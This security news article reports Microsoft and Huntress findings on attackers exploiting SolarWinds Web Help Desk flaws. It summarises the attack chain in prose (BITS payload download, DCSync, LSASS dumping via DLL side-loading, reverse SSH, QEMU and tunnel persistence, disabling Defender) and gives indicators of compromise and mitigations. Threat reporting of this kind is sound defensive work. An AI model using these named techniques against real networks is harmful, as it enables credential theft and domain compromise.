SolarWinds Web Help Desk RCE Exploited in Multi-Stage Enterprise Attacks on Exposed Servers

According to Microsoft & Huntress, threat actors are actively exploiting internet-exposed SolarWinds Web Help Desk (WHD) instances to gain remote code execution and pivot deeper into enterprise networks, according to Microsoft.

The attacks, observed in December 2025 and again in February 2026, show how a single exposed application can lead to full domain compromise when vulnerabilities remain unpatched.

The Microsoft Defender Security Research Team said it detected a multi-stage intrusion chain that began with exploitation of SolarWinds Web Help Desk and escalated into credential theft, persistence mechanisms, and Active Directory compromise.

In a technical report, Microsoft noted that it could not definitively confirm which vulnerability was used because the affected machines were exposed to multiple critical CVEs simultaneously.

“Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold,” Microsoft stated.

The activity has drawn further attention after the U.S. Cybersecurity and Infrastructure Security Agency, CISA, added CVE-2025-40551 to its Known Exploited Vulnerabilities catalog, citing active exploitation in the wild.

Vulnerabilities Linked to SolarWinds WHD Exploitation

Three high-severity flaws are under scrutiny:

CVE	Severity	Type	Impact
CVE-2025-40551	9.8	Deserialization	Remote Code Execution
CVE-2025-40536	8.1	Security control bypass	Unauthorized functionality access
CVE-2025-26399	9.8	Deserialization	Remote Code Execution

CVE-2025-40551 was recently added to CISA’s KEV list, and Federal Civilian Executive Branch agencies were ordered to patch by February 6, 2026.

Microsoft researchers explained that successful exploitation enabled attackers to achieve unauthenticated remote code execution within the Web Help Desk application context.

“Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS for payload download and execution,” researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini wrote.

Stage One: Initial Access via Exposed Web Help Desk

Attackers targeted publicly accessible WHD servers. Once inside, they executed arbitrary commands and began staging tools for deeper control.

The intrusion chain typically involved:

• Spawning PowerShell through the compromised WHD service
• Using Background Intelligent Transfer Service to download payloads
• Deploying legitimate remote monitoring tools for persistence

Microsoft observed the attackers downloading components of Zoho ManageEngine, a legitimate RMM platform, to maintain remote access.

Stage Two: Lateral Movement and Credential Theft

After establishing persistence, attackers began mapping the domain environment.

Post-exploitation activity included:

• Enumerating Domain Admins and privileged groups
• Executing DCSync to retrieve password hashes from Active Directory
• Dumping LSASS memory via DLL side-loading

In one instance, attackers used wab.exe, a legitimate Windows Address Book executable, to load a malicious sspicli.dll file to extract credentials from LSASS memory.

Microsoft described the pattern as a high-impact chain enabled by a single exposed service.

“This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored,” the company said.

Advanced Persistence Techniques Observed

The attackers relied heavily on living-off-the-land techniques. Rather than deploying obvious malware, they abused legitimate tools and system features.

Persistence mechanisms included:

• Reverse SSH access
• RDP sessions
• Scheduled tasks launching QEMU virtual machines under SYSTEM
• Port forwarding to conceal SSH backdoors

Microsoft emphasized that the attackers favored low-noise persistence over disruptive actions.

“In this intrusion, attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms,” the researchers said.

Huntress Investigation: Rapid Exploitation in February 2026

In a separate case documented on February 8, 2026, cybersecurity firm Huntress investigated an exploitation of SolarWinds WHD that occurred just one day earlier.

Huntress researchers reported that the threat actor rapidly deployed Zoho Assist, Cloudflare tunnels, and Velociraptor for command and control.

“The Velociraptor server URL utilized a Cloudflare Worker from the same Cloudflare account we have seen before across multiple intrusions,” Huntress researchers noted, linking the infrastructure to previous ToolShell exploitation and Warlock ransomware campaigns.

Huntress Observed Attack Flow

• Installed Zoho Assist via MSI
• Registered compromised host to a Proton Mail-linked account
• Deployed Velociraptor version 0.73.4
• Exploited known privilege escalation vulnerability CVE-2025-6264
• Installed Cloudflared for tunnel-based persistence
• Disabled Windows Defender and Windows Firewall
• Implemented live C2 failover mechanism

The failover system reconfigured Velociraptor to connect to a secondary server if the primary channel was blocked.

Enterprise Risk Implications

SolarWinds Web Help Desk is commonly deployed in enterprise IT environments. When exposed directly to the internet, it becomes a high-value target.

This campaign highlights several enterprise security realities:

• Internet-facing applications must be patched immediately
• RMM tools can be weaponized for stealth access
• Credential theft remains a primary escalation method
• Hypervisor and virtualization abuse is rising

Even brief exposure windows can lead to full domain compromise.

Indicators of Compromise

Security teams should investigate for:

• Unexpected PowerShell activity originating from WHD service
• Unauthorized Zoho Assist or ManageEngine installations
• Presence of Velociraptor agents
• QEMU scheduled tasks under SYSTEM
• Cloudflare tunnel services on nonstandard systems
• Disabled Defender or firewall registry modifications

Recommended Mitigation Steps

Organizations running SolarWinds WHD should:

• Patch all known CVEs immediately
• Remove unauthorized RMM agents
• Rotate all domain admin and service credentials
• Conduct LSASS dump artifact review
• Audit scheduled tasks and virtualization artifacts
• Isolate compromised servers

Defense in depth remains critical across identity, endpoint, and network layers.

Timeline of Key Developments

Date	Event
December 2025	Microsoft detects multi-stage WHD exploitation
February 6, 2026	CISA patch deadline for CVE-2025-40551
February 7, 2026	Huntress observes rapid exploitation case
February 8, 2026	Huntress publishes investigation report

FAQ: SolarWinds Web Help Desk RCE Exploitation

Which vulnerability is confirmed to be exploited?
Microsoft could not definitively confirm the exact CVE because affected systems were vulnerable to multiple high-severity flaws at the same time.

Is CVE-2025-40551 actively exploited?
Yes. CISA added it to the Known Exploited Vulnerabilities catalog.

What makes this attack dangerous?
Successful exploitation allows unauthenticated remote code execution, which can lead to full domain compromise.

Are RMM tools malicious?
No. They are legitimate tools. However, attackers frequently abuse them for persistence and stealth access.

How should enterprises respond?
Patch immediately, rotate credentials, audit domain controllers, and monitor for abnormal remote access tools.